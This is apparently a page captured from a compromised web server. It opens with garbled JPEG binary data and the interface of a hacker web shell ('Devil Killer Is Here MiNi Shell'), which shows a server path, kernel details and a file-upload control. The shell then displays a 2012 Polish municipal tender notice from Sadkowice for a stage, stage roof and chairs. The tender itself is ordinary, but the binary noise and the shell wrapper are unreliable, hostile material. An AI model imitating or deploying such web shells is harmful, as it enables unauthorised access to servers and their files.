JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120611/195994-N-2012.html

<p class="kh_header"><b>Sadkowice: Zakup wyposażenia w celu organizowania imprez kulturalnych w miejscowości Sadkowice - sceny, zadaszenia i krzeseł</b><br>
<b>Numer ogłoszenia: 195994 - 2012; data zamieszczenia: 11.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sadkowice , Sadkowice 129A, 96-206 Sadkowice, woj. łódzkie, tel. 46 8156191, faks 46 8156191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminasadkowice.pl; http://www.gminasadkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wyposażenia w celu organizowania imprez kulturalnych w miejscowości Sadkowice - sceny, zadaszenia i krzeseł.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:  dostawa  wyposażenia  w celu organizowania imprez kulturalnych w miejscowości Sadkowice -sceny, zadaszenia i krzeseł.
Szczegółowy zakres przedmiotu zamówienia obejmuje obejm dostawę wyposażenia opisanego szczegółowo poniżej:
A. SCENA
Scena o wymiarach 10 x 8 m z systemowych podestów scenicznych o konstrukcji aluminiowej i blatu podestu ze sklejki wodoodpornej wraz ze schodami wejściowymi na scenę. 
Specyfikacja ilościowa:
1.	Podest sceniczny (umożliwiające modułowe tworzenie scen)  - kolor: ciemny brąz lub grafit, wymiary: 2 x 1 m - 40 szt.
2.	Blaty podestów -atestowana płyta ze sklejki o grubości min. 15 mm z wodoodporną powłoką antypoślizgową. Wytrzymałość podestu min. 750 KG/m2.
3.	Nogi teleskopowe regulowane w zakresie  nie mniejszym niż 80 do 140 cm wraz ze stabilną stopą z tworzywa gumowego - 160 szt.
4.	Klamry spinające podesty - w odpowiedniej ilości by zapewnić stabilność i bezpieczeństwo.
5.	Kostki  samopoziomujące - komplet by zapewnić stabilność i możliwość regulacji dla całej powierzchni sceny 
6.	Klamry spinające nogi podestów - w odpowiedniej ilości by zapewnić stabilność i bezpieczeństwo sceny.
7.	Barierki ochronne  2m - 12 szt.(wraz z oprzyrządowaniem do umocowania barierek  do podestów)
8.	Barierka ochronna ok. 1m - 1 szt.(barierka musi być dopasowana do  szerokości schodów,  wraz z oprzyrządowaniem do umocowania barierek  do podestu i schodów).

Wymagania techniczne:
Podesty sceniczne umożliwiające tworzenie modułowych scen przenośnych o powyższych parametrach. Konstrukcja podestu umożliwiająca montaż na zewnątrz przy  nierównym terenie. Podesty sceniczne o konstrukcji aluminiowej z systemem łączenia zapewniającym trwałość i stabilność konstrukcji. Muszą posiadać powierzchnię antypoślizgową trwale mocowaną do podestów, wodoodporną oraz odporną na działanie warunków atmosferycznych (np. wiatr, słońce, deszcz). Podesty umożliwiające różnorodne modelowanie kształtu sceny, a jej rozmiar nie będzie wpływ na stabilność i bezpieczeństwo. 
Nogi teleskopowe wykonane z lekkiego profilu aluminiowego o  płynnej regulacji w zakresie nie mniejszym niż 0,8 m do  1,4 m, umożliwiające bezpieczne umiejscowienie podestu nie tylko na terenie płaskim, ale też w terenie na nierównych gruntach, gdzie konieczne są różne wysokości dla każdej z nóg w celu wypoziomowania podestu. Scena wyposażona  w barierki ochronne wraz z uchwytami mocującymi. Rama podestu  z rowkami teowymi umożliwiającymi montaż m.in. kostek samopoziomujących podestu przy łączeniu ich ze sobą uchwytów montażowych do barierek, schodów, i innego oprzyrządowania niezbędnego do funkcjonowania sceny. 
Przykładowe ilustracje sceny zawarto w załączniku nr 6  lub scena o parametrach równoważnych, zgodnych z opisem w niniejszym dziale III SIWZ.
Schody:
1.	Schody przegubowe, regulowane w zakresie nie mniejszym niż 
od 80 do 140 cm - 1 szt. (dopasowane do sceny z podestów wraz z barierkami i mocowaniem)
2.	Poręcze do schodów przegubowych - 1 kpl składający się z dwóch poręczy - po jednej z każdej strony schodów.
Profil schodów - stalowy
Stopnie schodów  wypełnienie;
- wodoodporna sklejka antypoślizgowa w kolorze podestów scenicznych lub
- aluminiowa blacha ryflowana
Wymagania techniczne:
Schody muszą być dopasowane do podestów,  zapewniać stabilność i bezpieczeństwo.  Barierki muszą stanowić komplet umożliwiający stabilne połączenie ze schodami wraz z niezbędnym osprzętem do zamocowania.
Schody przegubowe kompatybilne ze sceną, o regulacji w tym samym zakresie wysokości jak scena, ze stopniami wodoodpornymi- sklejka antypoślizgowa lub aluminiowa blacha ryflowana.
 Przykładowe ilustracje schodów zawarto w załącznik nr 6  lub schody o parametrach równoważnych, zgodnych z opisem w niniejszym dziale III SIWZ. 

B.	ZADASZENIE ESTRADOWE
.
Zadaszenie estradowe o wymiarach wewnętrznych 10,5 m x 8,0 m o konstrukcji z lekkich kratownic, poszycie dachu z plandeki PCV, wraz z siatkami bocznymi. Wysokość słupów min. 7 m.  Wysokość wewnętrzna sceny min. 6 m. Parametry zadaszenia muszą być odpowiednie by wewnątrz pod zadaszeniem mieściła się scena z podestów o parametrach 
10  x 8 m. Zadaszenie musi być dwuspadowe i wyposażone w siatki boczne z trzech stron, przepuszczające powietrze, zabezpieczające scenę przed wpływami czynników atmosferycznych (np. deszczu, śniegu), zwijane do góry. 
a) Konstrukcja główna:
- Słupy - kratownice  quadrosystem  aluminiowe minimum 390 x 390 x 3 mm z podstawami słupowymi- 4 szt.- aluminiowe,
- Obwiednia quadrosystem aluminiowa minimum 390 x 390 x 3 mm
- belka główna quadrosystem  aluminiowa minimum 390 x 390 x 3 mm
- żebra boczne unosystem minimum 50 x 2 mm
b) podstawy słupowe aluminiowe- 4 szt.
c) zabezpieczenia obwiedni - zawiesia
d)  stężenia linowe 
e) odciągi do balastów
f) wciągarki - minimum 1,0 t -odpowiednie do podnoszenia konstrukcji dachu- 4 szt.
g) wózki słupowe - 4 szt.
h) nastawki słupowe - 4 szt
i) skrzynia narzędziowa wyposażona w zapasowe elementy mocujące oraz komplet narzędzi
do montażu
j) plandeka górna z materiału PCV posiadająca atest trudnopalności, kolor: odcień ciemnej zieleni.
k) uchwyty umożliwiające montaż siatek bocznych.
l) siatki boczne -osłony boczne z trzech stron sceny (tył sceny i dwa boki)  wykonane z materiału przepuszczającego powietrze w kolorze czarnym lub zielonym, posiadające atest trudno zapalności, z możliwością wejścia na scenę z jednego boku (w miejscu schodów)
ł) załączenie instrukcji obsługi i certyfikatów

Wymagania techniczne zadaszenia osłaniającego scenę :
Konstrukcja zadaszenia dwuspadowa,  spełniająca powyższe wymagania, wykonana z kratownic aluminiowych w systemie QUADRO. Prostokątna rama nośna o parametrach 
min. 390 x 390 x 3 mm. Całość konstrukcji wykonana w oparciu o lekkie kratownice w systemie quadrosystem, a pola pomiędzy elementami podpierającymi plandekę (belki, żebra) w takiej ilości aby zapewnić równe ułożenie plandeki pokrycia dachu oraz swobodny odpływ wody na wypadek opadów deszczu oraz zapewnić bezpieczne użytkowanie. Całość konstrukcji zadaszenia mocowana do 4 wózków słupowych poruszających się wzdłuż słupów za pomocą 4 wyciągarek o udźwigu min. 1 tony każda, posiadających dopuszczenie techniczne, zapewniające swobodne opuszczanie i podnoszenie dachu. Obwiednia mocowana  na 4 słupach nośnych. Dach z pokryciem wodoszczelnym wykonanym z materiału PCV posiadającym atest trudnopalności i stosowny certyfikat. Parametry wewnętrzne  zadaszenia dwuspadowego: minimalne 10,5 x 8 m,  maksymalne 11,0 x 8,50 m. Parametry zadaszenia muszą być dopasowane do sceny  o wymiarach  10 x 8 m, i wszystko razem z siatkami bocznymi musi  być kompatybilne.
Siatki boczne posiadające atesty trudnopalności dopasowane do parametrów zadaszenia i sceny. Słupy nośne zadaszenia wykonane z kratownic aluminiowych w systemie QUADRO o wymiarach min.390 x 390 x 3 mm o wysokości min. 7 m, powinny posiadać u podstawy podpory boczne z możliwością ich płynnej regulacji na łączeniu z podłożem gwarantujące stabilne, równe ustawienie i bezpieczne użytkowanie zadaszenia . Łączenie ram całości konstrukcji powinno odbywać się za pomocą tzw. szybkozłączy. Zamawiający nie dopuszcza możliwości zastosowania śrub.
 Przykładowe ilustracje zadaszenia zawarto w załącznik nr 6  lub zadaszenie o parametrach równoważnych, zgodnych z opisem w niniejszym dziale III SIWZ. 

C.	KRZESŁA

Krzesła w złączonych  kompletach po 4 sztuki -  krzesła do zastosowania na wolnym powietrzu , siedzenie i oparcie plastikowe ( w kolorze ciemna zieleń lub ciemny brąz), rama metalowa lakierowana ( w kolorze czarnym), łączone w zestawach po 4 sztuki,  razem  100 zestawów po 4 krzesła, czyli łącznie 400  szt. krzeseł. 
Przykładowe ilustracje krzeseł zawarto w załącznik nr 6  lub krzesła o parametrach równoważnych, zgodnych z opisem w niniejszym dziale III SIWZ. 

D.	WYMAGANIA DODATKOWE

1. Szczegółowy zakres przedmiotu zamówienia przedstawiono w niniejszej SIWZ i na przykładowych ilustracjach wyposażenia stanowiących - załącznik nr 6 lub wyposażenie o parametrach równoważnych zgodnych z opisem w niniejszym dziale III SIWZ. Wyposażenie wymagane w kolorystyce określonej w dziale III niniejszej SIWZ.
Wymagania techniczne odnośnie przedmiotu zamówienia Zamawiający zawarł w dziale III - opis przedmiotu zamówienia pkt 3.1 SIWZ.
2. Wyposażenie należy dostarczyć do miejscowości Sadkowice, następnie dokonać rozładunku na działce komunalnej we wskazanym przez Zamawiającego miejscu, dokonać kompleksowej-pokazowej  prezentacji montażu sceny i zadaszenia oraz przeprowadzić szkolenie pracowników Zamawiającego w zakresie montażu i obsługi sceny i zadaszenia. 
3. Kompleksowy montaż sceny i zadaszenia na działce w Sadkowicach zostanie wykonany przez pracowników Wykonawcy, który przetarg wygra. Następnie Wykonawca ma obowiązek złożyć scenę i zadaszenie oraz przewieść do wskazanego przez Zamawiającego magazynu położonego w Sadkowicach i dokonać rozładunku w magazynie.
4. Zamawiający zastrzega, że na ilustracjach  wyposażenia - Załącznik nr 6 do SIWZ przedstawia się przykładowo elementy wyposażenia związane z wykonaniem niniejszego zamówienia. Zamawiający dopuszcza rozwiązania równoważne przedstawionym produktom. Zgodnie z dyspozycją art. 30 ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych: Wykonawca, który będzie powoływał się w swojej ofercie na rozwiązania równoważne opisywanym przez Zamawiającego, jest zobowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego, co należy rozumieć: o parametrach nie gorszych niż podane w opisie przedmiotu zamówienia zamieszczonym w niniejszej SIWZ. Wymagania techniczne odnośnie przedmiotu zamówienia Zamawiający zawarł w dziale III - opis przedmiotu zamówienia pkt 3.1 SIWZ.
5. Wszystkie elementy zamówienia muszą być fabrycznie nowe.
	6. Zamówienie obejmuje dostawę na koszt i ryzyko Wykonawcy w/w wyposażenia do miejsca wskazanego przez Zamawiającego.
	7. Dostarczone wyposażenie będzie skoordynowane i kompletne z punktu widzenia celu, któremu ma służyć. Do wyposażenia zostaną dołączone wymagane instrukcje obsługi i montażu w języku polskim oraz atesty, certyfikaty.
3.2.	Wykonawca udziela gwarancji na okres 36 m-cy licząc od spisania protokołu zdawczo-odbiorczego, na wszystkie elementy wyposażenia.
3.4.     Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z zasadami współczesnej wiedzy technicznej , obowiązującymi przepisami oraz obowiązującymi normami.
3.5.    Wykonawca jest zobowiązany dostarczyć przedmiot zamówienia, bez wad, spełniający wymagania techniczne, jakości i bezpieczeństwa określone w przepisach prawnych i w specyfikacji istotnych warunków zamówienia 
3.6.    Dostarczony przedmiot zamówienia powinien posiadać dokumentację formalno-prawną zgodną z obowiązującymi w tym zakresie przepisami, oraz ofertą wykonawcy. 
3.7.    Wykonawca jest odpowiedzialny za jakość, zgodność z normami i warunkami technicznymi oraz  jakościowymi dostarczonego wyposażeni. 
3.8 .   Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
3.9.    Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 
 
4.  Dodatkowe warunki realizacji przedmiotu zamówienia:

a) Zamówienie będzie współfinansowane w ramach działania  Odnowa  i rozwój wsi objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013.
Tytuł operacji : Zagospodarowanie centrum miejscowości Sadkowice oraz zakup wyposażenia w celu organizowania imprez kulturalnych.

b) Wykonawca przed złożeniem oferty cenowej  powinien dokładnie zapoznać się z dokumentacją przetargową  (wraz ze sprawdzeniem wszystkich elementów na  rysunkach oraz ilości i danych wymienionych w  SIWZ ). 

c) Zamawiający przewiduje płatności dla Wykonawcy po realizacji całego przedmiotu zamówienia,  w ciągu 30 dni licząc od dnia otrzymania przez Zamawiającego prawidłowo wypełnionej faktury, która będzie wystawiona przez Wykonawcę po odbiorze końcowym całego zadania i spisaniu protokołu zdawczo-odbiorczego przez Wykonawcę i Zamawiającego.

e) Oferta musi uwzględniać wszystkie koszty związane z prawidłową realizacją zamówienia. Przyjmuje się, że Wykonawca upewnił się co do prawidłowości i kompletności oferty, która powinna pokryć wszystkie jego zobowiązania umowne, a także wszystko to co może być konieczne dla właściwego wykonania  zamówienia.

f)  Szczegółowy zakres określono w Specyfikacji Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.38.00-4, 44.21.23.20-8, 39.29.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości:
 
3.000,00 PLN (słownie złotych: trzy tysiące złotych  00/100 PLN).                        
Wadium winno być wniesione w formie określonej w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Dowód wniesienia wadium należy dołączyć do oferty. Oryginał należy załączyć luzem, a kopię trwale spiąć z ofertą.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na konto  BSBR O/Sadkowice nr: 09 9291 0001 0035 8648 2000 0010   z takim wyprzedzeniem, aby środki znajdowały się na koncie Zamawiającego przed otwarciem ofert.
Zwrot, zatrzymanie lub ponowne wniesienie wadium następuje na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy Wykonawca złoży oświadczenie wg wzoru-załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy Wykonawca  udokumentuje, że w  okresie ostatnich trzech lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, Wykonawca należycie wykonał co najmniej 
1 dostawę o charakterze podobnym (np. dostawa: sceny, zadaszenia estradowego)  do rodzaju dostawy stanowiącej przedmiot zamówienia o wartości minimum 80.000 zł (brutto).
Wykonawca zobowiązany jest do przedstawienia dokumentów (np. referencji) potwierdzających, że wykazane dostawy, o których mowa powyżej, zostały wykonane należycie-Wykonawca złoży wykaz wg wzoru  załącznik nr 3 wraz z dokumentami potwierdzającymi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony gdy Wykonawca będzie dysponował osobami z odpowiednimi kwalifikacjami i uprawnieniami niezbędnymi do realizacji zadań stanowiących przedmiotu zamówienia. Sposób oceny spełnienia tego warunku nastąpi na podstawie oświadczenia Wykonawcy, że dysponuje odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia- złożone wg wzoru załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten Zamawiający uzna za spełniony gdy Wykonawca będzie dysponował osobami z odpowiednimi kwalifikacjami i uprawnieniami niezbędnymi do realizacji zadań stanowiących przedmiotu zamówienia. Sposób oceny spełnienia tego warunku nastąpi na podstawie oświadczenia Wykonawcy, że dysponuje odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia- złożone wg wzoru załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy wykonawca  złoży  oświadczenie , że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - złożone wg wzoru załącznik nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz ofertowy- sporządzony z wykorzystaniem wzoru  załącznik nr 1
2)	Kosztorys ofertowy  pomocniczy-sporządzony  z wykorzystaniem wzoru załącznik nr 7
3) W przypadku składania ofert wspólnej dokumenty  należy złożyć zgodnie z działem 
          VI D SIWZ.
4) Oświadczenie osoby fizycznej z art. 24 ust. 1 pkt 2- załącznik nr 8</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
